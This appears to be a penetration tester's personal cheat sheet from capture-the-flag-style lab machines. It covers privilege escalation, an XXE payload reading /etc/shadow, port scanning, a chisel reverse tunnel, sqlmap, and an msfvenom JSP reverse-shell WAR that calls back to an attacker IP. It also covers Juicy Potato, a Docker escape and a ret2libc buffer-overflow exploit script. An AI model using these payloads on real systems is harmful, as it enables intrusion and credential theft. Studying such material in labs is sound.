index

Escalation Basics SUID / SUDO

• Find SUID binaries find / -perm -4000 2>/dev/null
• Find what I can do SUDO sudo -l
• Bingo, there is an executable that we can do sudo without password!

•   (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
  

XEE (Xml Entity Exploit)

• if the remote server is parsing an xml of our own…
• we can use xmlentity to read internal files
• https://github.com/payloadbox/xxe-injection-payload-list

• <!--?xml version="1.0" ?-->
  <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
  <userInfo>
   <firstName>John</firstName>
   <lastName>&ent;</lastName>
  </userInfo>
  

• the &ent; is replaced with the content of the file

Port discovering

• nmap sudo nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.106 -oG allPorts
  • 80, 135, 445, 5985
• nmap nmap -sC -sV -p80,135,445,5985 10.10.11.106 -oN ports

Reverse tunnel with chisel

• to install chisel
  • 1. git clone git@github.com:jpillora/chisel.git
  • 2. CGO_ENABLED=0 go build ⇐ to build chasel as static binary
• In the attacker box ./chisel server -p 9090 --reverse
• In the victim box ./chisel client 10.10.14.6 -p 9000 R:8086:127.0.01:8086

SqlInjection with sqlmap

• Sql map can automatize part of the sql injection, you can get a requests and let sqlmap try different params
• 1. First we will get the request into a file with burpsuite…
• 2. sqlmap -r $(pwd)/request_file

WAR upload reverse shell

• if we are in a tomcat environment
  • there is the management/html and management/text
  • that allow to upload new applications
  • we can create a malicious war file https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat
  • msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.103 LPORT=4242 -f war > reverse.war
  • now open a nc to listen
    • sudo nc -nvlp 4242 -vvv

Linux process pooling

• Sometimes it’s interesting to know what is running in a cron job, one way is to use pspy https://github.com/DominicBreuker/pspy

Juicy Potate — Windows escalation

• we do whoami /priv if we see the SeImpersonatePrivilege or SeAssignPrimaryToken enabled…
• then we can use Juicy potato https://github.com/ohpe/juicy-potato to get administrator access

Escaping Docker container

• capsh to see which capacities we have
• capsh --print shows that I have cap_sys_module
• with this privilege we can insert new kernel modules ⇒ we crafted a kernel module that gives us a reverse shell.. https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_module

Buffer overflow - linux

• lets copy the binary to our machine to do it better :)

• install gef for gdb

  • to see the protections of the binary checksec in gdb
  • we have NX activated ⇐ meaning we cannot execute code in the stack
  • pattern create give you a pattern
  • run "<pattern here>"
  • pattern offset $eip ← shows we have a 52 bytes to exploit

• ret2libc since we have NX active (stack execution protection) → we need to use

  • we need addr for system /bin/sh and exit
  • in the victim machine we can 1 get the base addr of libcc
    • ldd <binary> → 0xb7e1900
  • get the offsets of system and exit
    • readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
    • we get the value of the system@@GLIBC_2.0 → 0003ada0
    • exit → 0002e9d0
    • to get the offset of a /bin/sh occurence:
      • strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh → 15ba0b
  • to get the full address of the
  • ret2libc = addr_of_system + addr_of_exit + addr_of_bin_sh

• is aslr active? cat /proc/sys/kernel/randomize_va_space (0 means no, 2 means yes)

  buffer script as s4vitar

  from struct import pack
  from subprocess import call
  
  RELLENO = "A"*52
  
  base = 0xb7e19000
  system_off =  0x0003ada0
  exit_off = 0x0002e9d0
  sh_off = 0x15ba0b
  
  
  system = base + system_off
  _exit = exit_off + base
  sh = sh_off + base
  
  payload = RELLENO + pack("<I", system) + pack("<I", _exit) + pack("<I", sh)
  
  call(["/home/ayush/.binary/rop", payload])
  print(payload)